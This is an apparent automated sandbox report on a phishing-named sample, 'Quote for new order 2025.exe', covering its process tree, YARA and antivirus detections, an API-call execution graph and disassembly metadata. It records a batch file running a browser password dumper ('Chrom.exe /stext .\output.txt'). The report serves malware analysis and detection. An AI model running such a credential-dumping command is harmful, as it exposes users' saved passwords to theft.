                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000004.00000000.1676249370.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\Desktop\Chrom.exe, Author: Joe Security
                                                                                                                                                      Antivirus matches:
                                                                                                                                                      • Detection: 81%, ReversingLabs
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:5
                                                                                                                                                      Start time:11:56:59
                                                                                                                                                      Start date:08/01/2025
                                                                                                                                                      Path:C:\Users\user\Desktop\Quote for new order 2025.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\Desktop\Quote for new order 2025.exe"
                                                                                                                                                      Imagebase:0x300000
                                                                                                                                                      File size:543'744 bytes
                                                                                                                                                      MD5 hash:11DE9D1BB135ADB354E26BDAD47037C9
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:false

                                                                                                                                                      General

                                                                                                                                                      Target ID:6
                                                                                                                                                      Start time:11:57:00
                                                                                                                                                      Start date:08/01/2025
                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\windown.bat" "
                                                                                                                                                      Imagebase:0x240000
                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:7
                                                                                                                                                      Start time:11:57:00
                                                                                                                                                      Start date:08/01/2025
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:8
                                                                                                                                                      Start time:11:57:00
                                                                                                                                                      Start date:08/01/2025
                                                                                                                                                      Path:C:\Users\user\Desktop\Chrom.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:.\Chrom.exe /stext .\output.txt
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:402'944 bytes
                                                                                                                                                      MD5 hash:2024EA60DA870A221DB260482117258B
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000002.1819130753.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000000.1800979457.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:11
                                                                                                                                                      Start time:11:57:07
                                                                                                                                                      Start date:08/01/2025
                                                                                                                                                      Path:C:\Users\user\Desktop\Quote for new order 2025.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\Desktop\Quote for new order 2025.exe"
                                                                                                                                                      Imagebase:0x760000
                                                                                                                                                      File size:543'744 bytes
                                                                                                                                                      MD5 hash:11DE9D1BB135ADB354E26BDAD47037C9
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:false

                                                                                                                                                      General

                                                                                                                                                      Target ID:12
                                                                                                                                                      Start time:11:57:08
                                                                                                                                                      Start date:08/01/2025
                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\windown.bat" "
                                                                                                                                                      Imagebase:0x240000
                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:13
                                                                                                                                                      Start time:11:57:08
                                                                                                                                                      Start date:08/01/2025
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:14
                                                                                                                                                      Start time:11:57:08
                                                                                                                                                      Start date:08/01/2025
                                                                                                                                                      Path:C:\Users\user\Desktop\Chrom.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:.\Chrom.exe /stext .\output.txt
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:402'944 bytes
                                                                                                                                                      MD5 hash:2024EA60DA870A221DB260482117258B
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000E.00000000.1883289782.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000E.00000002.1901575324.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                      Has exited:true

                                                                                                                                                      Disassembly

                                                                                                                                                      Reset < >

                                                                                                                                                        Execution Graph

                                                                                                                                                        Execution Coverage:9.5%
                                                                                                                                                        Dynamic/Decrypted Code Coverage:94.8%
                                                                                                                                                        Signature Coverage:3.4%
                                                                                                                                                        Total number of Nodes:233
                                                                                                                                                        Total number of Limit Nodes:28
                                                                                                                                                        execution_graph 38439 9e06040 DispatchMessageA 38440 9e060ac 38439->38440 38204 155fad0 38205 155fb38 CreateWindowExW 38204->38205 38207 155fbf4 38205->38207 38444 798a5d0 38445 798a609 38444->38445 38446 798a6cd 38445->38446 38447 7980338 3 API calls 38445->38447 38447->38446 38441 798aa32 38442 7980338 3 API calls 38441->38442 38443 798aa45 38442->38443 38208 1556d58 38209 1556d68 38208->38209 38210 1556d79 38209->38210 38213 1556db7 38209->38213 38218 1556e7f 38209->38218 38214 1556df2 38213->38214 38215 1556ee9 38214->38215 38223 1557011 38214->38223 38227 1557020 38214->38227 38215->38210 38219 1556e84 38218->38219 38220 1556ee9 38219->38220 38221 1557011 4 API calls 38219->38221 38222 1557020 4 API calls 38219->38222 38220->38210 38221->38220 38222->38220 38224 1557020 38223->38224 38225 1557067 38224->38225 38231 1556a90 38224->38231 38225->38215 38228 155702d 38227->38228 38229 1557067 38228->38229 38230 1556a90 4 API calls 38228->38230 38229->38215 38230->38229 38232 1556a95 38231->38232 38234 1557d80 38232->38234 38235 1557204 38232->38235 38234->38234 38236 155720f 38235->38236 38237 1557dfe 38236->38237 38247 155b340 38236->38247 38253 155b330 38236->38253 38259 1557234 38237->38259 38239 1557e18 38264 1557244 38239->38264 38241 1557e1f 38268 155d108 38241->38268 38273 155d120 38241->38273 38242 1557e29 38242->38234 38248 155b36e 38247->38248 38250 155b397 38248->38250 38279 155a0a4 GetFocus 38248->38279 38251 155b43a KiUserCallbackDispatcher 38250->38251 38252 155b566 38250->38252 38251->38252 38254 155b36e 38253->38254 38256 155b397 38254->38256 38280 155a0a4 GetFocus 38254->38280 38257 155b43a KiUserCallbackDispatcher 38256->38257 38258 155b566 38256->38258 38257->38258 38261 155723f 38259->38261 38263 155c891 38261->38263 38281 155c198 38261->38281 38262 155c88c 38262->38239 38263->38239 38265 155724f 38264->38265 38266 155cf4f 38265->38266 38285 155c29c 38265->38285 38266->38241 38269 155d120 38268->38269 38270 155d15d 38269->38270 38292 155d488 38269->38292 38295 155d478 38269->38295 38270->38242 38275 155d151 38273->38275 38276 155d19e 38273->38276 38274 155d15d 38274->38242 38275->38274 38277 155d478 GetModuleHandleW 38275->38277 38278 155d488 GetModuleHandleW 38275->38278 38276->38242 38277->38276 38278->38276 38279->38250 38280->38256 38283 155c1a3 38281->38283 38282 155ca75 38282->38262 38283->38282 38284 1557244 GetModuleHandleW 38283->38284 38284->38282 38286 155c2a7 38285->38286 38287 155d0c1 38286->38287 38288 155d022 38286->38288 38290 155d120 GetModuleHandleW 38286->38290 38291 155d108 GetModuleHandleW 38286->38291 38287->38266 38288->38287 38289 155c29c GetModuleHandleW 38288->38289 38289->38288 38290->38288 38291->38288 38299 155d4c8 38292->38299 38293 155d492 38293->38270 38296 155d488 38295->38296 38298 155d4c8 GetModuleHandleW 38296->38298 38297 155d492 38297->38270 38298->38297 38300 155d50c 38299->38300 38301 155d4e9 38299->38301 38300->38293 38301->38300 38302 155d710 GetModuleHandleW 38301->38302 38303 155d73d 38302->38303 38303->38293 38448 9e5eda8 38449 9e5edcf 38448->38449 38452 9e5d3c4 38449->38452 38454 9e5d3cf 38452->38454 38453 9e5edf3 38454->38453 38455 9e5efdf GetCurrentThreadId 38454->38455 38455->38453 38456 9e57528 38459 9e55404 38456->38459 38458 9e57571 38461 9e5540f 38459->38461 38460 9e5768a 38460->38458 38461->38460 38462 9e53638 DrawTextExW 38461->38462 38463 9e579e5 38462->38463 38463->38458 38304 9e5f16b 38305 9e5f17e 38304->38305 38309 9e5f380 38305->38309 38312 9e5f3a8 PostMessageW 38305->38312 38306 9e5f1a1 38310 9e5f3a8 PostMessageW 38309->38310 38311 9e5f414 38310->38311 38311->38306 38313 9e5f414 38312->38313 38313->38306 38464 79810c8 38465 79811f7 38464->38465 38466 79810f5 38464->38466 38467 7980338 3 API calls 38466->38467 38468 7981115 38466->38468 38467->38468 38483 9e00910 DispatchMessageW 38484 9e0097c 38483->38484 38469 9e5f831 38471 9e5f861 38469->38471 38470 9e5fc40 WaitMessage 38470->38471 38471->38470 38472 9e5f8ec 38471->38472 38475 9e5fd40 PeekMessageW 38471->38475 38477 9e5fd38 38471->38477 38476 9e5fdb7 38475->38476 38476->38471 38478 9e5fd3b PeekMessageW 38477->38478 38479 9e5fd0a 38477->38479 38480 9e5fdb7 38478->38480 38479->38477 38480->38471 38314 1557540 38315 1557586 GetCurrentProcess 38314->38315 38317 15575d1 38315->38317 38318 15575d8 GetCurrentThread 38315->38318 38317->38318 38319 1557615 GetCurrentProcess 38318->38319 38320 155760e 38318->38320 38321 155764b 38319->38321 38320->38319 38322 1557673 GetCurrentThreadId 38321->38322 38323 15576a4 38322->38323 38481 1557788 DuplicateHandle 38482 155781e 38481->38482 38324 798a887 38325 798a891 38324->38325 38327 798a9e6 38325->38327 38328 7980338 38325->38328 38329 7980343 38328->38329 38330 7981257 38329->38330 38333 798c4c0 38329->38333 38338 798c4b1 38329->38338 38335 798c4e2 38333->38335 38334 798c552 38334->38330 38335->38334 38343 798c998 38335->38343 38347 798ca1c 38335->38347 38340 798c4e2 38338->38340 38339 798c552 38339->38330 38340->38339 38341 798c998 3 API calls 38340->38341 38342 798ca1c 3 API calls 38340->38342 38341->38339 38342->38339 38344 798ca0c 38343->38344 38353 798ce30 38343->38353 38361 798ce24 38343->38361 38344->38334 38348 798c9e6 38347->38348 38349 798ca36 38348->38349 38351 798ce30 3 API calls 38348->38351 38352 798ce24 3 API calls 38348->38352 38350 798ca0c 38350->38334 38351->38350 38352->38350 38354 798ce66 38353->38354 38355 798cf04 38354->38355 38369 9e50897 38354->38369 38374 9e508a8 38354->38374 38356 798cfb8 38355->38356 38379 9e53a80 38355->38379 38383 9e53a90 38355->38383 38356->38344 38362 798ce30 38361->38362 38363 798cf04 38362->38363 38365 9e50897 DrawTextExW 38362->38365 38366 9e508a8 DrawTextExW 38362->38366 38364 798cfb8 38363->38364 38367 9e53a80 GetSysColorBrush 38363->38367 38368 9e53a90 GetSysColorBrush 38363->38368 38364->38344 38365->38363 38366->38363 38367->38364 38368->38364 38370 9e508a6 38369->38370 38387 9e50f08 38370->38387 38397 9e50f18 38370->38397 38371 9e50982 38371->38355 38375 9e508cc 38374->38375 38377 9e50f08 DrawTextExW 38375->38377 38378 9e50f18 DrawTextExW 38375->38378 38376 9e50982 38376->38355 38377->38376 38378->38376 38380 9e53a83 38379->38380 38381 9e53ef6 GetSysColorBrush 38380->38381 38382 9e53eb3 38380->38382 38381->38382 38382->38356 38384 9e53b0e 38383->38384 38385 9e53ef6 GetSysColorBrush 38384->38385 38386 9e53eb3 38384->38386 38385->38386 38386->38356 38391 9e50f2a 38387->38391 38393 9e5100a 38387->38393 38388 9e50f18 DrawTextExW 38389 9e5107f 38388->38389 38390 9e50f18 DrawTextExW 38389->38390 38392 9e51092 38390->38392 38391->38388 38391->38393 38394 9e511ea 38392->38394 38407 9e51a50 38392->38407 38411 9e51a3f 38392->38411 38393->38371 38394->38371 38401 9e50f2a 38397->38401 38403 9e5100a 38397->38403 38398 9e50f18 DrawTextExW 38399 9e5107f 38398->38399 38400 9e50f18 DrawTextExW 38399->38400 38402 9e51092 38400->38402 38401->38398 38401->38403 38404 9e511ea 38402->38404 38405 9e51a50 DrawTextExW 38402->38405 38406 9e51a3f DrawTextExW 38402->38406 38403->38371 38404->38371 38405->38404 38406->38404 38409 9e51a80 38407->38409 38408 9e51bd1 38408->38394 38409->38408 38415 9e51c27 38409->38415 38412 9e51a43 38411->38412 38413 9e51a0e 38412->38413 38414 9e51c27 DrawTextExW 38412->38414 38413->38394 38414->38413 38417 9e51c59 38415->38417 38416 9e51c6e 38416->38408 38417->38416 38421 9e52b20 38417->38421 38427 9e52b30 38417->38427 38418 9e51cca 38423 9e52b51 38421->38423 38422 9e52b69 38422->38418 38423->38422 38433 9e53628 38423->38433 38436 9e53638 38423->38436 38424 9e52c7c 38424->38418 38429 9e52b51 38427->38429 38428 9e52b69 38428->38418 38429->38428 38431 9e53628 DrawTextExW 38429->38431 38432 9e53638 DrawTextExW 38429->38432 38430 9e52c7c 38430->38418 38431->38430 38432->38430 38434 9e524ec DrawTextExW 38433->38434 38435 9e53655 38434->38435 38435->38424 38437 9e53655 38436->38437 38438 9e524ec DrawTextExW 38436->38438 38437->38424 38438->38437

                                                                                                                                                        Executed Functions

                                                                                                                                                        Function 09E017D0 Relevance: 9.4, Strings: 4, Instructions: 4369COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3544623404.0000000009E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E00000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_9e00000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: ($($($(
                                                                                                                                                        • API String ID: 0-3521244429
                                                                                                                                                        • Opcode ID: 29208302a46357d4a7d4762eb5a2309e0e6585441fe353a8aaabd5f6ee7a5fcf
                                                                                                                                                        • Instruction ID: 6f8d303b19b67e4d20ed587b5135dfb8ddee071ccfb90dfbb3667c268b07e471
                                                                                                                                                        • Opcode Fuzzy Hash: 29208302a46357d4a7d4762eb5a2309e0e6585441fe353a8aaabd5f6ee7a5fcf
                                                                                                                                                        • Instruction Fuzzy Hash: 65B38278A55119CFCB64CF64C998AA8B7F1FF49305F1190EAE509AB361DB35AE81CF00
                                                                                                                                                        Function 0798B8C8 Relevance: 5.3, Strings: 4, Instructions: 268COMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1554 798b8c8-798b8e7 1555 798b8ed-798b90d call 79873c4 1554->1555 1556 798ba12-798ba37 1554->1556 1560 798b91d-798b930 1555->1560 1561 798b90f-798b912 1555->1561 1564 798ba3e-798ba6a 1556->1564 1567 798ba05-798ba0f 1560->1567 1568 798b936-798b946 1560->1568 1561->1560 1563 798b914-798b917 1561->1563 1563->1560 1563->1564 1590 798ba71 1564->1590 1570 798b948-798b94d 1568->1570 1571 798b94f-798b954 1568->1571 1574 798b97f-798b997 call 798b2d0 1570->1574 1572 798b964-798b969 1571->1572 1573 798b956-798b962 1571->1573 1575 798b97a-798b97c 1572->1575 1576 798b96b-798b978 1572->1576 1573->1574 1579 798b99c-798b9a7 1574->1579 1575->1574 1576->1574 1581 798b9ad-798b9c0 1579->1581 1582 798ba76-798bad2 call 798b2ec 1579->1582 1587 798ba01-798ba03 1581->1587 1588 798b9c2-798b9ff 1581->1588 1592 798bad8-798bae9 1582->1592 1593 798bbcc 1582->1593 1587->1567 1587->1590 1588->1587 1590->1582 1599 798bb99-798bbc5 1592->1599 1600 798baef-798bb37 call 798b2f8 1592->1600 1595 798bbd1-798bbd5 1593->1595 1597 798bbe9 1595->1597 1598 798bbd7-798bbe6 1595->1598 1598->1597 1599->1593 1615 798bb39-798bb5e 1600->1615 1616 798bb60-798bb64 1600->1616 1615->1595 1617 798bb7d-798bb97 1616->1617 1618 798bb66-798bb78 call 798b2f8 1616->1618 1617->1595 1618->1617
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3542821888.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_7980000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: $(&^q$(bq$Hbq
                                                                                                                                                        • API String ID: 0-1723523991
                                                                                                                                                        • Opcode ID: 0d5e52beb10121a2c488a1eda2b301b9635d42ec53af769b472bb0d2d70a15ac
                                                                                                                                                        • Instruction ID: c66e90af570518c5df4703df956866e20dc7c02a6f34ec29990d39fa1b1bbad0
                                                                                                                                                        • Opcode Fuzzy Hash: 0d5e52beb10121a2c488a1eda2b301b9635d42ec53af769b472bb0d2d70a15ac
                                                                                                                                                        • Instruction Fuzzy Hash: 3091B2F1E002099FDB54EF69C854AAFBAFAEF88314F148429E405EB354DF359901CBA5
                                                                                                                                                        Function 09E53A90 Relevance: 2.0, APIs: 1, Instructions: 514COMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 2780 9e53a90-9e53b1a call 9e54329 2783 9e53b7c-9e53b8d 2780->2783 2784 9e53b1c-9e53b76 call 9e54869 2780->2784 2788 9e53c06-9e53c56 2783->2788 2789 9e53b8f-9e53bfc 2783->2789 2784->2783 2796 9e53c5e-9e53c90 call 9e50b38 call 9e5255c 2788->2796 2893 9e53bfe call 9e55dd0 2789->2893 2894 9e53bfe call 9e55ddb 2789->2894 2795 9e53c04 2795->2796 2802 9e53c96-9e53c9e 2796->2802 2803 9e540ee-9e54101 2796->2803 2804 9e53ca4-9e53cab 2802->2804 2805 9e53d62 2802->2805 2813 9e54107-9e5410e 2803->2813 2814 9e5427a-9e5429e 2803->2814 2807 9e53cb4-9e53cbb 2804->2807 2808 9e53cad-9e53cb2 2804->2808 2806 9e53d64-9e53d6e 2805->2806 2815 9e53d70-9e53d87 2806->2815 2816 9e53d89-9e53ddd 2806->2816 2811 9e53cc1-9e53cd1 2807->2811 2812 9e53cbd-9e53cbf 2807->2812 2810 9e53cd4-9e53cd6 2808->2810 2819 9e53cdc-9e53ce3 2810->2819 2820 9e53d5e 2810->2820 2811->2810 2812->2810 2813->2814 2827 9e54114-9e5426f 2813->2827 2818 9e53dde-9e53e04 2815->2818 2816->2818 2828 9e53f91-9e53f93 2818->2828 2829 9e53e0a-9e53e14 2818->2829 2830 9e53ce5-9e53cec 2819->2830 2831 9e53d5a 2819->2831 2824 9e53d60 2820->2824 2824->2806 2827->2814 2828->2803 2833 9e53f99-9e53faf 2828->2833 2834 9e53e16-9e53e1f 2829->2834 2835 9e53e21 2829->2835 2842 9e53cee-9e53cf8 2830->2842 2843 9e53cfa 2830->2843 2836 9e53d5c 2831->2836 2833->2803 2844 9e53fb5-9e53fce 2833->2844 2837 9e53e23-9e53e25 2834->2837 2835->2837 2836->2824 2837->2828 2841 9e53e2b-9e53e34 2837->2841 2841->2828 2851 9e53e3a-9e53e68 2841->2851 2845 9e53cfc-9e53cfe 2842->2845 2843->2845 2854 9e53ff5-9e540dd 2844->2854 2855 9e53fd0-9e53ff0 call 9e52578 2844->2855 2845->2831 2846 9e53d00-9e53d13 2845->2846 2858 9e53d15-9e53d27 2846->2858 2859 9e53d53-9e53d58 2846->2859 2856 9e53e75 2851->2856 2857 9e53e6a-9e53e73 2851->2857 2889 9e540df 2854->2889 2890 9e540eb-9e540ec 2854->2890 2855->2854 2860 9e53e77-9e53eb1 2856->2860 2857->2860 2858->2859 2871 9e53d29-9e53d3b 2858->2871 2859->2836 2864 9e53ed5-9e53f37 GetSysColorBrush 2860->2864 2865 9e53eb3-9e53ed3 2860->2865 2874 9e53f40-9e53f4a 2864->2874 2875 9e53f39-9e53f3f 2864->2875 2873 9e53f4c-9e53f8c call 9e5256c 2865->2873 2882 9e53d3d-9e53d4d 2871->2882 2883 9e53d4f-9e53d51 2871->2883 2873->2828 2874->2873 2875->2874 2882->2836 2883->2836 2889->2890 2890->2803 2893->2795 2894->2795
                                                                                                                                                        APIs
                                                                                                                                                        • GetSysColorBrush.USER32(00000000), ref: 09E53F20
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3544688384.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_9e50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BrushColor
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 464657469-0
                                                                                                                                                        • Opcode ID: 55851740f70507f3359d843302c7ef0b149e47b98cb8c6bea06c88f81ad15c77
                                                                                                                                                        • Instruction ID: ecda13d4cdf971c67a07479be98ce301be51fd8063d5dfce1f9acd62d645f434
                                                                                                                                                        • Opcode Fuzzy Hash: 55851740f70507f3359d843302c7ef0b149e47b98cb8c6bea06c88f81ad15c77
                                                                                                                                                        • Instruction Fuzzy Hash: 2A321A35900619CFCB21EF64C944BD9B7B2FF89304F1595E9E80AAB261DB71AE85CF40
                                                                                                                                                        Function 0798D8E8 Relevance: 2.0, Strings: 1, Instructions: 700COMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 2896 798d8e8-798da0f 2901 798da15-798dae1 2896->2901 2902 798dae6-798daf0 2896->2902 2912 798de1f-798de2b 2901->2912 2903 798dc8d-798de13 2902->2903 2904 798daf6-798dc88 2902->2904 2903->2912 2904->2912 2915 798de2d-798de34 2912->2915 2916 798de61-798de8a 2912->2916 2920 798de3d-798de44 2915->2920 2921 798de36-798de3b 2915->2921 2917 798defd-798df52 2916->2917 2932 798df5d-798dff1 2917->2932 2933 798df54 2917->2933 2923 798de4a-798de5a 2920->2923 2924 798de46-798de48 2920->2924 2922 798de5d-798de5f 2921->2922 2922->2916 2925 798de8c-798def6 2922->2925 2923->2922 2924->2922 2925->2917 2943 798dffc-798e071 2932->2943 2944 798dff3 2932->2944 2933->2932 2934 798df56 2933->2934 2934->2932 2953 798e12c-798e162 2943->2953 2954 798e077-798e11c 2943->2954 2944->2943 2945 798dff5 2944->2945 2945->2943 2960 798e164 2953->2960 2961 798e176-798e183 2953->2961 2954->2953 2957 798e11e-798e12b 2954->2957 2957->2953 2960->2961 2962 798e166-798e174 2960->2962 2964 798e184-798e18e 2961->2964 2962->2964 2966 798e1ff-798e20f 2964->2966 2967 798e190-798e1a8 2964->2967 2970 798e210-798e221 2966->2970 2967->2970 2971 798e1aa-798e1b1 2967->2971 3006 798e223 call 798e768 2970->3006 3007 798e223 call 798e639 2970->3007 3008 798e223 call 798e720 2970->3008 2972 798e1ba-798e1c1 2971->2972 2973 798e1b3-798e1b8 2971->2973 2976 798e1c3-798e1c5 2972->2976 2977 798e1c7-798e1d7 2972->2977 2975 798e1da-798e1dc 2973->2975 2975->2970 2978 798e1de-798e1fd 2975->2978 2976->2975 2977->2975 2978->2970 2979 798e229-798e248 call 798cba4 2983 798e24d-798e371 call 798cba4 * 9 2979->2983 3004 798e37f 2983->3004 3005 798e373 2983->3005 3005->3004 3006->2979 3007->2979 3008->2979
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3542821888.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_7980000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: fff?
                                                                                                                                                        • API String ID: 0-4136771917
                                                                                                                                                        • Opcode ID: 00cb0a2a72559dbde2f98804041f0e43d4c54482067a38372a16227eb903f18f
                                                                                                                                                        • Instruction ID: f76a38058b75c595fd7cd2d49e3bad48d41909aa61b815d2ef5b70cb52b796c3
                                                                                                                                                        • Opcode Fuzzy Hash: 00cb0a2a72559dbde2f98804041f0e43d4c54482067a38372a16227eb903f18f
                                                                                                                                                        • Instruction Fuzzy Hash: 60623C32810A1ADFCF11DF50C884AD9B7B2FF9A304F1586D5E9086B165E771AAD5CF80
                                                                                                                                                        Function 09E5F831 Relevance: 1.8, APIs: 1, Instructions: 329COMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
